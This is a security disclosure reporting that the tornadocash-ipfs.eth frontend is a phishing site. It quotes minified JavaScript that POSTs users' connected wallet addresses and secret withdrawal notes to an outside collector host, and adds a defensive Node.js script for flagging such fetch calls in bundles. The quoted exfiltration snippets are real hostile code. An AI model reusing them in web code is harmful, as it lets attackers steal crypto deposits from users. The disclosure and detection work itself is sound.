Discovery process:
Today, while studying the tornado protocol, I searched for available withdrawal frontends through a search engine and discovered this very "decentralized" frontend at https://ipfs.io/ipns/tornadocash-ipfs.eth/. The website looks legitimate, but when I inspected the network requests, I found that the JavaScript on this webpage has abnormal behavior and the frontend is reporting highly sensitive user data.
Analysis:
In Chrome, when globally searching the code for the reporting address, bafybeiebdyj3wuyrn32rzeq3aldsfyjsefqnmetdapjgljczkkgrizkuk4[.]cfipfs[.]com/v1, I found a lot of reporting code that sends sensitive data: users' connected wallets, withdrawal notes, withdrawal addresses, and the entire process. The malicious code is stored in edafb4b.js, which can be found at https://ipfs.io/ipns/tornadocash-ipfs.eth/_nuxt/edafb4b.js.
Some of the reporting code is as follows:
(1) Reporting the connected wallet address:
// Excerpt from edafb4b.js; t holds the address of the wallet the user has just connected
{
    fetch("https://bafybeiebdyj3wuyrn32rzeq3aldsfyjsefqnmetdapjgljczkkgrizkuk4.cfipfs.com/v1/", {
        headers: {
            "content-type": "application/json; charset=UTF-8"
        },
        // the address is spliced into a JSON string and sent to the collector endpoint
        body: '{"connectedwallet": "'.concat(t, '"}'),
        method: "POST"
    }).then(function() {})   // the response is ignored: fire-and-forget reporting
}
(2) Reporting the generated withdrawal note by the user:
// Excerpt from edafb4b.js; runs in the component that generates the deposit note
(function() {
    this.prefix,
    this.note;   // no-op expression statement left behind by the minifier
    fetch("https://bafybeiebdyj3wuyrn32rzeq3aldsfyjsefqnmetdapjgljczkkgrizkuk4.cfipfs.com/v1", {
        headers: {
            "content-type": "application/json; charset=UTF-8"
        },
        // the complete note "<prefix>-<note>" is sent; the note is the secret needed to withdraw the deposit
        body: '{"newdepositnote": "'.concat(this.prefix, "-").concat(this.note, '"}'),
        method: "POST"
    }).then(function() {})
})
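An added example, not code from this report or from the frontend: a small Node.js triage script that lists every fetch() call in a bundle such as edafb4b.js whose URL is a string literal, and flags POSTs to hosts outside an allow-list. The allow-list, the function name scanBundle and the sample bundle text are constructed for this example.

```javascript
const EXPECTED_HOSTS = new Set(["ipfs.io"]); // hypothetical allow-list of hosts the frontend should talk to

// Matches fetch("<url>", { ... }) with one level of nested braces in the options
// object, which covers the flat literals that minifiers emit.
const FETCH_RE =
  /fetch\(\s*["'`](https?:\/\/[^"'`]+)["'`]\s*(?:,\s*(\{[^{}]*(?:\{[^{}]*\}[^{}]*)*\}))?/g;

function scanBundle(source, allowedHosts = EXPECTED_HOSTS) {
  const findings = [];
  for (const m of source.matchAll(FETCH_RE)) {
    const url = new URL(m[1]);
    const opts = m[2] || "";
    const methodMatch = /method\s*:\s*["'](\w+)["']/i.exec(opts);
    const method = (methodMatch ? methodMatch[1] : "GET").toUpperCase();
    // JSON keys hard-coded into a string template such as '{"newdepositnote": "'
    // show what is sent even though the value is concatenated in at runtime.
    const keys = [...opts.matchAll(/\{\s*\\?"(\w+)\\?"\s*:/g)].map((k) => k[1]);
    findings.push({
      host: url.hostname,
      method,
      keys,
      suspicious: method === "POST" && !allowedHosts.has(url.hostname),
    });
  }
  return findings;
}

// Constructed sample shaped like the snippets quoted above (not the real bundle).
const SAMPLE_BUNDLE = `
fetch("https://ipfs.io/ipns/example.eth/config.json").then((r) => r.json());
fetch("https://bafybeiebdyj3wuyrn32rzeq3aldsfyjsefqnmetdapjgljczkkgrizkuk4.cfipfs.com/v1/", {
  headers: { "content-type": "application/json; charset=UTF-8" },
  body: '{"connectedwallet": "'.concat(t, '"}'),
  method: "POST"
}).then(function () {});
fetch("https://bafybeiebdyj3wuyrn32rzeq3aldsfyjsefqnmetdapjgljczkkgrizkuk4.cfipfs.com/v1", {
  headers: { "content-type": "application/json; charset=UTF-8" },
  body: '{"newdepositnote": "'.concat(this.prefix, "-").concat(this.note, '"}'),
  method: "POST"
}).then(function () {});
`;

// Usage: node scan.js [bundle.js]; without an argument it scans the sample above.
if (typeof require !== "undefined" && require.main === module) {
  const src = process.argv[2] ? require("fs").readFileSync(process.argv[2], "utf8") : SAMPLE_BUNDLE;
  for (const f of scanBundle(src).filter((f) => f.suspicious)) {
    console.log(`POST to ${f.host} sending keys: ${f.keys.join(", ") || "(none found)"}`);
  }
}
```

The regex approach is a quick first pass over a minified bundle; calls that build the URL at runtime or go through XMLHttpRequest need a second look in the browser's network panel, as the report above did.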
Conclusion:
The tornadocash-ipfs.eth frontend is a phishing website.